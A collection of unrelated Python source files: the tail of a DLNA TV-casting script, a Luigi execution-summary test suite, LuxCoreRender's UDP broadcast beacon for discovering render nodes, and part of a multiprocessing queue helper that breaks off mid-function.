urllibreq.urlopen(request)
except HTTPError as e:
content = e.read()
print(content)
def start_dlna(self, filePath, deviceUrl, action, file_url=None):
'''
preparetion to start dlna cast
files_urls : <str> path to file to play
deviceUrl : <dict> file info necessary to start stream
action : <str> action to perform
-> Start
-> Stop
'''
files = {"file_video" : filePath}
device = self.register_device(deviceUrl['location'])
# Configure streaming server
target_ip = device["hostname"]
serve_ip = self.get_serve_ip(target_ip)
try:
files_urls = self.start_server(files, serve_ip)
except Exception as e:
if type(file_url) is dict:
files_urls = file_url
print(file_url)
print(files_urls)
video_data = {
"uri_video": files_urls["file_video"],
"type_video": os.path.splitext(files_urls["file_video"])[1][1:],
}
video_data["metadata"] = ""
try: # try to set up file on TV
self.send_dlna_action(device, video_data, "SetAVTransportURI")
except Exception as e:
pass
self.send_dlna_action(device, video_data, action)
print(action)
return files_urls
def main():
return dlnaTv()
if __name__ == "__main__":
a = dlnaTv()
file = r"C:\Users\MARK\Desktop\Explorer\VZ Anime\download here\dw\valerian.mp4"
#a.set_files({"file_video":r"C:\Java\Visual Basic Code\source\mirror 4.0\ABSOLUTE5\Jainbo\media\t.mp4"}, '192.168.1.2', '9000')
#a.start_dlna(file,
# {'location':"http://192.168.1.7:57351"}, "Stop")
#a.start_dlna(file,
# {'location':"http://192.168.1.7:57351"}, "Play")
#time.sleep(10)
a.start_dlna(file,
{'location':"http://192.168.1.7:57351"}, "Seek")
|
execution_summary_test.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2015-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import LuigiTestCase, RunOnceTask, with_config
import luigi
import luigi.worker
import luigi.execution_summary
import threading
import datetime
import mock
from enum import Enum
class ExecutionSummaryTest(LuigiTestCase):
def setUp(self):
super(ExecutionSummaryTest, self).setUp()
self.scheduler = luigi.scheduler.CentralPlannerScheduler(prune_on_get_work=False)
self.worker = luigi.worker.Worker(scheduler=self.scheduler)
def run_task(self, task):
self.worker.add(task) # schedule
self.worker.run() # run
def summary_dict(self):
return luigi.execution_summary._summary_dict(self.worker)
def summary(self):
return luigi.execution_summary.summary(self.worker)
def test_all_statuses(self):
class Bar(luigi.Task):
num = luigi.IntParameter()
def run(self):
if self.num == 0:
raise ValueError()
def complete(self):
if self.num == 1:
return True
return False
class Foo(luigi.Task):
def requires(self):
for i in range(5):
yield Bar(i)
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({Bar(num=1)}, d['already_done'])
self.assertEqual({Bar(num=2), Bar(num=3), Bar(num=4)}, d['completed'])
self.assertEqual({Bar(num=0)}, d['failed'])
self.assertEqual({Foo()}, d['upstream_failure'])
self.assertFalse(d['upstream_missing_dependency'])
self.assertFalse(d['run_by_other_worker'])
self.assertFalse(d['still_pending_ext'])
summary = self.summary()
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 6 tasks of which:',
'* 1 present dependencies were encountered:',
' - 1 Bar(num=1)',
'* 3 ran successfully:',
' - 3 Bar(num=2,3,4)',
'* 1 failed:',
' - 1 Bar(num=0)',
'* 1 were left pending, among these:',
' * 1 had failed dependencies:',
' - 1 Foo()',
'',
'This progress looks :( because there were failed tasks',
'',
'===== Luigi Execution Summary =====',
'']
result = summary.split('\n')
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
def test_check_complete_error(self):
class Bar(luigi.Task):
def run(self):
pass
def complete(self):
raise Exception
return True
class Foo(luigi.Task):
def requires(self):
yield Bar()
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({Foo()}, d['still_pending_not_ext'])
self.assertEqual({Foo()}, d['upstream_scheduling_error'])
self.assertEqual({Bar()}, d['scheduling_error'])
self.assertFalse(d['unknown_reason'])
self.assertFalse(d['already_done'])
self.assertFalse(d['completed'])
self.assertFalse(d['failed'])
self.assertFalse(d['upstream_failure'])
self.assertFalse(d['upstream_missing_dependency'])
self.assertFalse(d['run_by_other_worker'])
self.assertFalse(d['still_pending_ext'])
summary = self.summary()
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 2 tasks of which:',
'* 1 failed running complete() or requires():',
' - 1 Bar()',
'* 1 were left pending, among these:',
" * 1 had dependencies whose complete() or requires() failed:",
' - 1 Foo()',
'',
'Did not run any tasks',
'This progress looks :( because there were tasks whose complete() or requires() failed',
'',
'===== Luigi Execution Summary =====',
'']
result = summary.split('\n')
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
def test_deps_error(self):
class Bar(luigi.Task):
def run(self):
pass
def complete(self):
return True
class Foo(luigi.Task):
def requires(self):
raise Exception
yield Bar()
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({Foo()}, d['scheduling_error'])
self.assertFalse(d['upstream_scheduling_error'])
self.assertFalse(d['unknown_reason'])
self.assertFalse(d['already_done'])
self.assertFalse(d['completed'])
self.assertFalse(d['failed'])
self.assertFalse(d['upstream_failure'])
self.assertFalse(d['upstream_missing_dependency'])
self.assertFalse(d['run_by_other_worker'])
self.assertFalse(d['still_pending_ext'])
summary = self.summary()
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 1 tasks of which:',
'* 1 failed running complete() or requires():',
' - 1 Foo()',
'',
'Did not run any tasks',
'This progress looks :( because there were tasks whose complete() or requires() failed',
'',
'===== Luigi Execution Summary =====',
'']
result = summary.split('\n')
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
@with_config({'execution_summary': {'summary-length': '1'}})
def test_config_summary_limit(self):
class Bar(luigi.Task):
num = luigi.IntParameter()
def run(self):
pass
def complete(self):
return True
class Biz(Bar):
pass
class Bat(Bar):
pass
class Wut(Bar):
pass
class Foo(luigi.Task):
def requires(self):
yield Bat(1)
yield Wut(1)
yield Biz(1)
for i in range(4):
yield Bar(i)
def complete(self):
return False
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({Bat(1), Wut(1), Biz(1), Bar(0), Bar(1), Bar(2), Bar(3)}, d['already_done'])
self.assertEqual({Foo()}, d['completed'])
self.assertFalse(d['failed'])
self.assertFalse(d['upstream_failure'])
self.assertFalse(d['upstream_missing_dependency'])
self.assertFalse(d['run_by_other_worker'])
self.assertFalse(d['still_pending_ext'])
summary = self.summary()
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 8 tasks of which:',
'* 7 present dependencies were encountered:',
' - 4 Bar(num=0...3)',
' ...',
'* 1 ran successfully:',
' - 1 Foo()',
'',
'This progress looks :) because there were no failed tasks or missing external dependencies',
'',
'===== Luigi Execution Summary =====',
'']
result = summary.split('\n')
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
def test_upstream_not_running(self):
class ExternalBar(luigi.ExternalTask):
num = luigi.IntParameter()
def complete(self):
if self.num == 1:
return True
return False
class Bar(luigi.Task):
num = luigi.IntParameter()
def run(self):
if self.num == 0:
raise ValueError()
class Foo(luigi.Task):
def requires(self):
for i in range(5):
yield ExternalBar(i)
yield Bar(i)
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({ExternalBar(num=1)}, d['already_done'])
self.assertEqual({Bar(num=1), Bar(num=2), Bar(num=3), Bar(num=4)}, d['completed'])
self.assertEqual({Bar(num=0)}, d['failed'])
self.assertEqual({Foo()}, d['upstream_failure'])
self.assertEqual({Foo()}, d['upstream_missing_dependency'])
self.assertFalse(d['run_by_other_worker'])
self.assertEqual({ExternalBar(num=0), ExternalBar(num=2), ExternalBar(num=3), ExternalBar(num=4)}, d['still_pending_ext'])
s = self.summary()
self.assertIn('\n* 1 present dependencies were encountered:\n - 1 ExternalBar(num=1)\n', s)
self.assertIn('\n* 4 ran successfully:\n - 4 Bar(num=1...4)\n', s)
self.assertIn('\n* 1 failed:\n - 1 Bar(num=0)\n', s)
self.assertIn('\n* 5 were left pending, among these:\n * 4 were missing external dependencies:\n - 4 ExternalBar(num=', s)
self.assertIn('\n * 1 had failed dependencies:\n'
' - 1 Foo()\n'
' * 1 had missing external dependencies:\n'
' - 1 Foo()\n\n'
'This progress looks :( because there were failed tasks\n', s)
self.assertNotIn('\n\n\n', s)
def test_already_running(self):
lock1 = threading.Lock()
lock2 = threading.Lock()
class ParentTask(RunOnceTask):
def requires(self):
yield LockTask()
class LockTask(RunOnceTask):
def run(self):
lock2.release()
lock1.acquire()
self.comp = True
lock1.acquire()
lock2.acquire()
other_worker = luigi.worker.Worker(scheduler=self.scheduler, worker_id="other_worker")
other_worker.add(ParentTask())
t1 = threading.Thread(target=other_worker.run)
t1.start()
lock2.acquire()
self.run_task(ParentTask())
lock1.release()
t1.join()
d = self.summary_dict()
self.assertEqual({LockTask()}, d['run_by_other_worker'])
self.assertEqual({ParentTask()}, d['upstream_run_by_other_worker'])
s = self.summary()
self.assertIn('\nScheduled 2 tasks of which:\n'
'* 2 were left pending, among these:\n'
' * 1 were being run by another worker:\n'
' - 1 LockTask()\n'
' * 1 had dependencies that were being run by other worker:\n'
' - 1 ParentTask()\n', s)
self.assertIn('\n\nThe other workers were:\n'
' - other_worker ran 1 tasks\n\n'
'Did not run any tasks\n'
'This progress looks :) because there were no failed '
'tasks or missing external dependencies\n', s)
self.assertNotIn('\n\n\n', s)
def test_already_running_2(self):
class AlreadyRunningTask(luigi.Task):
def run(self):
pass
other_worker = luigi.worker.Worker(scheduler=self.scheduler, worker_id="other_worker")
other_worker.add(AlreadyRunningTask()) # This also registers this worker
old_func = luigi.scheduler.CentralPlannerScheduler.get_work
def new_func(*args, **kwargs):
new_kwargs = kwargs.copy()
new_kwargs['worker'] = 'other_worker'
old_func(*args, **new_kwargs)
return old_func(*args, **kwargs)
with mock.patch('luigi.scheduler.CentralPlannerScheduler.get_work', new_func):
self.run_task(AlreadyRunningTask())
d = self.summary_dict()
self.assertFalse(d['already_done'])
self.assertFalse(d['completed'])
self.assertFalse(d['unknown_reason'])
self.assertEqual({AlreadyRunningTask()}, d['run_by_other_worker'])
def test_unknown_reason(self):
class AlreadyRunningTask(luigi.Task):
def run(self):
pass
other_worker = luigi.worker.Worker(scheduler=self.scheduler, worker_id="other_worker")
other_worker.add(AlreadyRunningTask()) # This also registers this worker
old_func = luigi.scheduler.CentralPlannerScheduler.get_work
def new_func(*args, **kwargs):
kwargs['current_tasks'] = None
old_func(*args, **kwargs)
return old_func(*args, **kwargs)
with mock.patch('luigi.scheduler.CentralPlannerScheduler.get_work', new_func):
self.run_task(AlreadyRunningTask())
d = self.summary_dict()
self.assertFalse(d['already_done'])
self.assertFalse(d['completed'])
self.assertFalse(d['run_by_other_worker'])
self.assertEqual({AlreadyRunningTask()}, d['unknown_reason'])
s = self.summary()
self.assertIn('\nScheduled 1 tasks of which:\n'
'* 1 were left pending, among these:\n'
' * 1 were left pending because of unknown reason:\n'
' - 1 AlreadyRunningTask()\n', s)
self.assertNotIn('\n\n\n', s)
def test_somebody_else_finish_task(self):
class SomeTask(RunOnceTask):
pass
other_worker = luigi.worker.Worker(scheduler=self.scheduler, worker_id="other_worker")
self.worker.add(SomeTask())
other_worker.add(SomeTask())
other_worker.run()
self.worker.run()
d = self.summary_dict()
self.assertFalse(d['already_done'])
self.assertFalse(d['completed'])
self.assertFalse(d['run_by_other_worker'])
self.assertEqual({SomeTask()}, d['unknown_reason'])
def test_somebody_else_disables_task(self):
class SomeTask(luigi.Task):
def complete(self):
return False
def run(self):
raise ValueError()
other_worker = luigi.worker.Worker(scheduler=self.scheduler, worker_id="other_worker")
self.worker.add(SomeTask())
other_worker.add(SomeTask())
other_worker.run() # Assuming it is disabled for a while after this
self.worker.run()
d = self.summary_dict()
self.assertFalse(d['already_done'])
self.assertFalse(d['completed'])
self.assertFalse(d['run_by_other_worker'])
self.assertEqual({SomeTask()}, d['unknown_reason'])
def test_larger_tree(self):
class Dog(RunOnceTask):
def requires(self):
yield Cat(2)
class Cat(luigi.Task):
num = luigi.IntParameter()
def __init__(self, *args, **kwargs):
super(Cat, self).__init__(*args, **kwargs)
self.comp = False
def run(self):
if self.num == 2:
raise ValueError()
self.comp = True
def complete(self):
if self.num == 1:
return True
else:
return self.comp
class Bar(RunOnceTask):
num = luigi.IntParameter()
def requires(self):
if self.num == 0:
yield ExternalBar()
yield Cat(0)
if self.num == 1:
yield Cat(0)
yield Cat(1)
if self.num == 2:
yield Dog()
class Foo(luigi.Task):
def requires(self):
for i in range(3):
yield Bar(i)
class ExternalBar(luigi.ExternalTask):
def complete(self):
return False
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({Cat(num=1)}, d['already_done'])
self.assertEqual({Cat(num=0), Bar(num=1)}, d['completed'])
self.assertEqual({Cat(num=2)}, d['failed'])
self.assertEqual({Dog(), Bar(num=2), Foo()}, d['upstream_failure'])
self.assertEqual({Bar(num=0), Foo()}, d['upstream_missing_dependency'])
self.assertFalse(d['run_by_other_worker'])
self.assertEqual({ExternalBar()}, d['still_pending_ext'])
s = self.summary()
self.assertNotIn('\n\n\n', s)
def test_with_dates(self):
""" Just test that it doesn't crash with date params """
start = datetime.date(1998, 3, 23)
class Bar(RunOnceTask):
date = luigi.DateParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(10):
new_date = start + datetime.timedelta(days=i)
yield Bar(date=new_date)
self.run_task(Foo())
d = self.summary_dict()
exp_set = {Bar(start + datetime.timedelta(days=i)) for i in range(10)}
exp_set.add(Foo())
self.assertEqual(exp_set, d['completed'])
s = self.summary()
self.assertIn('date=1998-0', s)
self.assertIn('Scheduled 11 tasks', s)
self.assertIn('Luigi Execution Summary', s)
self.assertNotIn('00:00:00', s)
self.assertNotIn('\n\n\n', s)
def test_with_ranges_minutes(self):
start = datetime.datetime(1998, 3, 23, 1, 50)
class Bar(RunOnceTask):
time = luigi.DateMinuteParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(300):
new_time = start + datetime.timedelta(minutes=i)
yield Bar(time=new_time)
self.run_task(Foo())
d = self.summary_dict()
exp_set = {Bar(start + datetime.timedelta(minutes=i)) for i in range(300)}
exp_set.add(Foo())
self.assertEqual(exp_set, d['completed'])
s = self.summary()
self.assertIn('Bar(time=1998-03-23T0150...1998-03-23T0649)', s)
self.assertNotIn('\n\n\n', s)
def test_with_ranges_one_param(self):
class Bar(RunOnceTask):
num = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(11):
yield Bar(i)
self.run_task(Foo())
d = self.summary_dict()
exp_set = {Bar(i) for i in range(11)}
exp_set.add(Foo())
self.assertEqual(exp_set, d['completed'])
s = self.summary()
self.assertIn('Bar(num=0...10)', s)
self.assertNotIn('\n\n\n', s)
def test_with_ranges_multiple_params(self):
class Bar(RunOnceTask):
num1 = luigi.IntParameter()
num2 = luigi.IntParameter()
num3 = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(5):
yield Bar(5, i, 25)
self.run_task(Foo())
d = self.summary_dict()
exp_set = {Bar(5, i, 25) for i in range(5)}
exp_set.add(Foo())
self.assertEqual(exp_set, d['completed'])
s = self.summary()
self.assertIn('- 5 Bar(num1=5, num2=0...4, num3=25)', s)
self.assertNotIn('\n\n\n', s)
def test_with_two_tasks(self):
class Bar(RunOnceTask):
num = luigi.IntParameter()
num2 = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(2):
yield Bar(i, 2 * i)
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({Foo(), Bar(num=0, num2=0), Bar(num=1, num2=2)}, d['completed'])
summary = self.summary()
result = summary.split('\n')
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 3 tasks of which:',
'* 3 ran successfully:',
' - 2 Bar(num=0, num2=0) and Bar(num=1, num2=2)',
' - 1 Foo()',
'',
'This progress looks :) because there were no failed tasks or missing external dependencies',
'',
'===== Luigi Execution Summary =====',
'']
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
def test_really_long_param_name(self):
class Bar(RunOnceTask):
This_is_a_really_long_parameter_that_we_should_not_print_out_because_people_will_get_annoyed = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
yield Bar(0)
self.run_task(Foo())
s = self.summary()
self.assertIn('Bar(...)', s)
self.assertNotIn("Did not run any tasks", s)
self.assertNotIn('\n\n\n', s)
def test_multiple_params_multiple_same_task_family(self):
class Bar(RunOnceTask):
num = luigi.IntParameter()
num2 = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(4):
yield Bar(i, 2 * i)
self.run_task(Foo())
summary = self.summary()
result = summary.split('\n')
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 5 tasks of which:',
'* 5 ran successfully:',
' - 4 Bar(num=0, num2=0) ...',
' - 1 Foo()',
'',
'This progress looks :) because there were no failed tasks or missing external dependencies',
'',
'===== Luigi Execution Summary =====',
'']
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
def test_happy_smiley_face_normal(self):
class Bar(RunOnceTask):
num = luigi.IntParameter()
num2 = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(4):
yield Bar(i, 2 * i)
self.run_task(Foo())
s = self.summary()
self.assertIn('\nThis progress looks :) because there were no failed tasks or missing external dependencies', s)
self.assertNotIn("Did not run any tasks", s)
self.assertNotIn('\n\n\n', s)
def test_happy_smiley_face_other_workers(self):
lock1 = threading.Lock()
lock2 = threading.Lock()
class ParentTask(RunOnceTask):
def requires(self):
yield LockTask()
class LockTask(RunOnceTask):
def run(self):
lock2.release()
lock1.acquire()
self.comp = True
lock1.acquire()
lock2.acquire()
other_worker = luigi.worker.Worker(scheduler=self.scheduler, worker_id="other_worker")
other_worker.add(ParentTask())
t1 = threading.Thread(target=other_worker.run)
t1.start()
lock2.acquire()
self.run_task(ParentTask())
lock1.release()
t1.join()
s = self.summary()
self.assertIn('\nThis progress looks :) because there were no failed tasks or missing external dependencies', s)
self.assertNotIn('\n\n\n', s)
def test_sad_smiley_face(self):
class ExternalBar(luigi.ExternalTask):
def complete(self):
return False
class Bar(luigi.Task):
num = luigi.IntParameter()
def run(self):
if self.num == 0:
raise ValueError()
class Foo(luigi.Task):
def requires(self):
for i in range(5):
yield Bar(i)
yield ExternalBar()
self.run_task(Foo())
s = self.summary()
self.assertIn('\nThis progress looks :( because there were failed tasks', s)
self.assertNotIn("Did not run any tasks", s)
self.assertNotIn('\n\n\n', s)
def test_neutral_smiley_face(self):
class ExternalBar(luigi.ExternalTask):
def complete(self):
return False
class Foo(luigi.Task):
def requires(self):
yield ExternalBar()
self.run_task(Foo())
s = self.summary()
self.assertIn('\nThis progress looks :| because there were missing external dependencies', s)
self.assertNotIn('\n\n\n', s)
def test_did_not_run_any_tasks(self):
class ExternalBar(luigi.ExternalTask):
num = luigi.IntParameter()
def complete(self):
if self.num == 5:
return True
return False
class Foo(luigi.Task):
def requires(self):
for i in range(10):
yield ExternalBar(i)
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual({ExternalBar(5)}, d['already_done'])
self.assertEqual({ExternalBar(i) for i in range(10) if i != 5}, d['still_pending_ext'])
self.assertEqual({Foo()}, d['upstream_missing_dependency'])
s = self.summary()
self.assertIn('\n\nDid not run any tasks\nThis progress looks :| because there were missing external dependencies', s)
self.assertNotIn('\n\n\n', s)
def test_example(self):
class MyExternal(luigi.ExternalTask):
def complete(self):
return False
class Boom(luigi.Task):
this_is_a_really_long_I_mean_way_too_long_and_annoying_parameter = luigi.IntParameter()
def requires(self):
for i in range(5, 200):
yield Bar(i)
class Foo(luigi.Task):
num = luigi.IntParameter()
num2 = luigi.IntParameter()
def requires(self):
yield MyExternal()
yield Boom(0)
class Bar(luigi.Task):
num = luigi.IntParameter()
def complete(self):
return True
class DateTask(luigi.Task):
date = luigi.DateParameter()
num = luigi.IntParameter()
def requires(self):
yield MyExternal()
yield Boom(0)
class EntryPoint(luigi.Task):
def requires(self):
for i in range(10):
yield Foo(100, 2 * i)
for i in range(10):
yield DateTask(datetime.date(1998, 3, 23) + datetime.timedelta(days=i), 5)
self.run_task(EntryPoint())
summary = self.summary()
expected = ['',
'===== Luigi Execution Summary =====',
'',
'Scheduled 218 tasks of which:',
'* 195 present dependencies were encountered:',
' - 195 Bar(num=5...199)',
'* 1 ran successfully:',
' - 1 Boom(...)',
'* 22 were left pending, among these:',
' * 1 were missing external dependencies:',
' - 1 MyExternal()',
' * 21 had missing external dependencies:',
' - 10 DateTask(date=1998-03-23...1998-04-01, num=5)',
' - 1 EntryPoint()',
' - 10 Foo(num=100, num2=0) ...',
'',
'This progress looks :| because there were missing external dependencies',
'',
'===== Luigi Execution Summary =====',
'']
result = summary.split('\n')
self.assertEqual(len(result), len(expected))
for i, line in enumerate(result):
self.assertEqual(line, expected[i])
def test_with_datehours(self):
""" Just test that it doesn't crash with datehour params """
start = datetime.datetime(1998, 3, 23, 5)
class Bar(RunOnceTask):
datehour = luigi.DateHourParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(10):
new_date = start + datetime.timedelta(hours=i)
yield Bar(datehour=new_date)
self.run_task(Foo())
d = self.summary_dict()
exp_set = {Bar(start + datetime.timedelta(hours=i)) for i in range(10)}
exp_set.add(Foo())
self.assertEqual(exp_set, d['completed'])
s = self.summary()
self.assertIn('datehour=1998-03-23T0', s)
self.assertIn('Scheduled 11 tasks', s)
self.assertIn('Luigi Execution Summary', s)
self.assertNotIn('00:00:00', s)
self.assertNotIn('\n\n\n', s)
def test_with_months(self):
""" Just test that it doesn't crash with month params """
start = datetime.datetime(1998, 3, 23)
class Bar(RunOnceTask):
month = luigi.MonthParameter()
class Foo(luigi.Task):
def requires(self):
for i in range(3):
new_date = start + datetime.timedelta(days=30*i)
yield Bar(month=new_date)
self.run_task(Foo())
d = self.summary_dict()
exp_set = {Bar(start + datetime.timedelta(days=30*i)) for i in range(3)}
exp_set.add(Foo())
self.assertEqual(exp_set, d['completed'])
s = self.summary()
self.assertIn('month=1998-0', s)
self.assertIn('Scheduled 4 tasks', s)
self.assertIn('Luigi Execution Summary', s)
self.assertNotIn('00:00:00', s)
self.assertNotIn('\n\n\n', s)
def test_multiple_dash_dash_workers(self):
"""
Don't print own worker with ``--workers 2`` setting.
"""
self.worker = luigi.worker.Worker(scheduler=self.scheduler, worker_processes=2)
class Foo(RunOnceTask):
pass
self.run_task(Foo())
d = self.summary_dict()
self.assertEqual(set(), d['run_by_other_worker'])
s = self.summary()
self.assertNotIn('The other workers were', s)
self.assertIn('This progress looks :) because there were no failed ', s)
self.assertNotIn('\n\n\n', s)
def test_with_uncomparable_parameters(self):
"""
Don't rely on parameters being sortable
"""
class Color(Enum):
red = 1
yellow = 2
class Bar(RunOnceTask):
eparam = luigi.EnumParameter(enum=Color)
class Baz(RunOnceTask):
eparam = luigi.EnumParameter(enum=Color)
another_param = luigi.IntParameter()
class Foo(luigi.Task):
def requires(self):
yield Bar(Color.red)
yield Bar(Color.yellow)
yield Baz(Color.red, 5)
yield Baz(Color.yellow, 5)
self.run_task(Foo())
s = self.summary()
self.assertIn('yellow', s)
|
netbeacon.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
################################################################################
# Copyright 1998-2018 by authors (see AUTHORS.txt)
#
# This file is part of LuxCoreRender.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import logging
import socket
import threading
import functools
import pyluxcoretools.utils.loghandler as loghandler
logger = logging.getLogger(loghandler.loggerName + ".netbeacon")
BROADCAST_PORT = 18019
class NetBeaconSender:
def __init__(self, ipAddress, port, broadCastAddress, period=3.0):
self.socket = None
self.thread = None
self.ipAddress = ipAddress
self.port = port
self.broadCastAddress = broadCastAddress
self.period = period
def Start(self):
# Create the socket
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# Create the thread
self.thread = threading.Thread(target=functools.partial(NetBeaconSender.__BeaconThread, self))
self.thread.name = "NetBeaconSenderThread"
# Run the thread
self.stopEvent = threading.Event()
self.thread.start()
def Stop(self):
self.stopEvent.set()
self.thread.join(5.0)
self.socket.close()
def __BeaconThread(self):
logger.info("NetBeaconSender thread started.")
pingMsg = bytearray((
"LUXNETPING\n" +
str(self.ipAddress) + "\n" +
str(self.port) + "\n"
).encode("utf-8"))
while not self.stopEvent.is_set():
logger.debug("NetBeaconSender LUXNETPING sent: " + str(pingMsg))
self.socket.sendto(pingMsg, (self.broadCastAddress, BROADCAST_PORT))
self.stopEvent.wait(self.period)
logger.info("NetBeaconSender thread done.")
class NetBeaconReceiver:
def __init__(self, callback):
self.socket = None
self.thread = None
self.callback = callback
def Start(self):
# Create the socket
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.socket.settimeout(1)
self.socket.bind(('', BROADCAST_PORT))
# Create the thread
self.thread = threading.Thread(target=functools.partial(NetBeaconReceiver.__BeaconThread, self))
self.thread.name = "NetBeaconReceiverThread"
# Run the thread
self.stopEvent = threading.Event()
self.thread.start()
def Stop(self):
self.stopEvent.set()
self.thread.join()
# Shutdown can not be used with UDP sockets so I can not wakeup
# the thread form the socket.recvfrom()
#self.socket.shutdown(socket.SHUT_RDWR)
self.socket.close()
def __BeaconThread(self):
logger.info("NetBeaconReceiver thread started.")
try:
while not self.stopEvent.is_set():
try:
data, whereFrom = self.socket.recvfrom(4096)
if (not data):
break
except socket.timeout:
continue
logger.debug("NetBeaconReceiver LUXNETPING received from " + str(whereFrom) + ": " + str(data))
tag, ipAddress, port, _ = data.decode("utf-8").split("\n")
if (tag != "LUXNETPING"):
continue
if (ipAddress == ""):
ipAddress = str(whereFrom[0])
self.callback(ipAddress, int(port))
except Exception as e:
logger.info("BeaconThread exception:")
logger.exception(e)
logger.info("NetBeaconReceiver thread done.")
|
mp.py
|
import os
import pickle
import struct
import sys
from functools import partial
from multiprocessing import Lock, Event as ProcessEvent
from threading import Thread, Event as TrEvent
from time import sleep, time
from typing import List, Dict, Optional
from multiprocessing import Process
import psutil
from six.moves.queue import Empty, Queue as TrQueue
from ..py3_interop import AbstractContextManager
try:
from multiprocessing import SimpleQueue
except ImportError:
from multiprocessing.queues import SimpleQueue
# Windows/MacOS compatibility
try:
from multiprocessing.context import ForkContext # noqa
except ImportError:
ForkContext = None
# PY2 compatibility
try:
from multiprocessing import get_context
except ImportError:
def get_context(*args, **kwargs):
return False
class ThreadCalls(object):
def __init__(self):
self._queue = TrQueue()
self._thread = Thread(target=self._worker)
self._thread.daemon = True
self._thread.start()
def is_alive(self):
return bool(self._thread)
def apply_async(self, func, args=None):
if not func:
return False
self._queue.put((func, args))
return True
def close(self, timeout=5.):
t = self._thread
if not t:
return
try:
# push something into queue so it knows this is the end
self._queue.put(None)
# wait fot thread it should not take long, so we have a 5 second timeout
# the background thread itself is doing nothing but push into a queue, so it should not take long
t.join(timeout=timeout)
except BaseException: # noqa
pass
# mark thread is done
self._thread = None
def _worker(self):
while True:
try:
request = self._queue.get(block=True, timeout=1.0)
if not request:
break
except Empty:
continue
# noinspection PyBroadException
try:
if request[1]:
request[0](*request[1])
else:
request[0]()
except Exception:
pass
self._thread = None
class SingletonThreadPool(object):
__thread_pool = None
__thread_pool_pid = None
@classmethod
def get(cls):
if os.getpid() != cls.__thread_pool_pid:
cls.__thread_pool = ThreadCalls()
cls.__thread_pool_pid = os.getpid()
return cls.__thread_pool
@classmethod
def clear(cls):
if cls.__thread_pool:
cls.__thread_pool.close()
cls.__thread_pool = None
cls.__thread_pool_pid = None
@classmethod
def is_active(cls):
return cls.__thread_pool and cls.__thread_pool.is_alive()
class SafeQueue(object):
"""
Many writers Single Reader multiprocessing safe Queue
"""
__thread_pool = SingletonThreadPool()
def __init__(self, *args, **kwargs):
self._reader_thread = None
self._reader_thread_started = False
# Fix the python Queue and Use SimpleQueue write so it uses a single OS write,
# making it atomic message passing
self._q = SimpleQueue(*args, **kwargs)
# noinspection PyBroadException
try:
# noinspection PyUnresolvedReferences,PyProtectedMember
self._q._writer._send_bytes = partial(SafeQueue._pipe_override_send_bytes, self._q._writer)
except Exception:
pass
self._internal_q = None
self._q_size = 0
def empty(self):
return self._q.empty() and (not self._internal_q or self._internal_q.empty())
def is_pending(self):
# check if we have pending requests to be pushed (it does not mean they were pulled)
# only call from main put process
return self._q_size > 0
def close(self, event, timeout=3.0):
# wait until all pending requests pushed
tic = time()
prev_q_size = self._q_size
while self.is_pending():
if event:
event.set()
if not self.__thread_pool.is_active():
break
sleep(0.1)
# timeout is for the maximum time to pull a single object from the queue,
# this way if we get stuck we notice quickly and abort
if timeout and (time()-tic) > timeout:
if prev_q_size == self._q_size:
break
else:
prev_q_size = self._q_size
tic = time()
def get(self, *args, **kwargs):
return self._get_internal_queue(*args, **kwargs)
def batch_get(self, max_items=1000, timeout=0.2, throttle_sleep=0.1):
buffer = []
timeout_count = int(timeout/throttle_sleep)
empty_count = timeout_count
while len(buffer) < max_items:
while not self.empty() and len(buffer) < max_items:
